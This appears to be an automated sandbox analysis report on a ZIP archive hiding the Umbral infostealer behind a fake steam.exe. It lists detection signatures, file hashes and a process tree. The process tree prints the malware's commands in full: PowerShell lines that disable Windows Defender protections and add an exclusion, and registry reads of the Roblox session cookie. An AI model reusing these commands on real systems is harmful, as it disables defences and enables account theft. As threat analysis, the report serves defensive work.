Overview

overview

10

Static

static

10

skeet (1) (skeet).zip

windows10-2004-x64

10

Analysis

  • max time kernel
    75s
  • max time network
    74s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2025 03:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    skeet (1) (skeet).zip

  • Size

    3.5MB

  • MD5

    4ec3431f372650d231b13b3688e62959

  • SHA1

    6380f8899ced0cde4d4347504ce63c5da49bd196

  • SHA256

    a67211d3d5d58e9193a6a99db1f44c05d96bf48f6f6589ea6d0b91f92233d611

  • SHA512

    138b799e10609bd10736348be67cce6ca951b895f9dce31ec978406da087ed90468da33553baafba1f62275e0211981d8b256225b1d826b877b96f980e5d65b5

  • SSDEEP

    98304:QHJEPWBVNTfNSrTV8h/kUvHvj6pdDZYFkoXXCPBZMnYPJ2k:QHJEPWHNT1STVavsqFkonsBcMYk

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 4 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\skeet (1) (skeet).zip"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3996
  • C:\Users\Admin\Desktop\steam.exe
    "C:\Users\Admin\Desktop\steam.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Users\Admin\AppData\Local\Temp\stilak.exe
      "C:\Users\Admin\AppData\Local\Temp\stilak.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2336
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:756
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stilak.exe"
        3⤵
        • Views/modifies file attributes
        PID:2576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stilak.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:448
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:976
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3000
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:3388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            PID:4584
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:4232
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stilak.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4860
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1732
        • C:\Users\Admin\AppData\Local\Temp\steam.exe
          "C:\Users\Admin\AppData\Local\Temp\steam.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1048

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        9414279c978fc63be2d6e8cdd60de7d0

        SHA1

        b86a7b232ca0605e889a399cbbfda1f21f307c4e

        SHA256

        8842ede011bb1789493ca4f9c641d02a2774ae088dd9a272ca577bfe98f41040

        SHA512

        8431b5d229ae27144510627f90107f685cc67502d58efc95b36bd994af9f72f9356a8dba17dd033e7d52e269ea00bf67ede22e3c0140c589e9919bb10b41a62c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        c65738617888921a153bd9b1ef516ee7

        SHA1

        5245e71ea3c181d76320c857b639272ac9e079b1

        SHA256

        4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

        SHA512

        2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        548dd08570d121a65e82abb7171cae1c

        SHA1

        1a1b5084b3a78f3acd0d811cc79dbcac121217ab

        SHA256

        cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

        SHA512

        37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixcgzjwq.m4y.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\steam.exe
        Filesize

        23KB

        MD5

        afe9b68ed167f0ec45a28bd47d3054f7

        SHA1

        bd07d119f7cc88573d864d68aa3d3612fcbbea9f

        SHA256

        aadd255a8efe2491b29c1d5917f72db3eea93ffde89995985a19d0d4c172213c

        SHA512

        657c69fa4ddc7a609d22f7e0a10911103177197a56a69d3c9d9461d8e8db6ca732c315e4b1f1bbb0934b6dee29574e569a381b02e3c3f40b6e392eb7b1659349

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\stilak.exe
        Filesize

        229KB

        MD5

        e3b279ecf73025b241b9d73de1351b64

        SHA1

        2c1c4234db6df0155120c0bafc57cc03317d206e

        SHA256

        2437e5beaf8b761df7c3a080509144c7242104f892a53252904c5056bde4b0bc

        SHA512

        2bc56a70c9343c223eac3adf8852796cd38a4b7b145b45b213a41f862afa58fa3573b36dc96dc3ac34a5843fa9875a2282dbcfcb5d139a9bcffb22fdeb05d44b

        Download Submit

      • C:\Users\Admin\Desktop\steam.exe
        Filesize

        262KB

        MD5

        cf08d3d9c4114b4320ce81df382eb2b4

        SHA1

        b5f63e6fccc4b4e0f7160732370c53ae8f4ee8dd

        SHA256

        8014176421621d377b9f6e42a2fa7d6991306c2be124fe890c13ac3c43cbf25f

        SHA512

        8d49e928958215cec941752058cb8f0991a9710863b02c3ab689e3ed246412b73773b708428e04cfa45a1899b648d31986b9a6d41babfaf673411cffe12d1cef

        Download Submit

      • memory/468-26-0x0000000000400000-0x0000000000449000-memory.dmp

        Filesize

        292KB

        Download

      • memory/1584-37-0x0000014044330000-0x0000014044352000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2336-54-0x0000011C5F1F0000-0x0000011C5F266000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2336-55-0x0000011C5F1A0000-0x0000011C5F1F0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2336-56-0x0000011C5F170000-0x0000011C5F18E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2336-23-0x0000011C44AC0000-0x0000011C44B00000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2336-20-0x00007FFEF0243000-0x00007FFEF0245000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2336-93-0x0000011C5F280000-0x0000011C5F28A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2336-94-0x0000011C5F2B0000-0x0000011C5F2C2000-memory.dmp

        Filesize

        72KB

        Download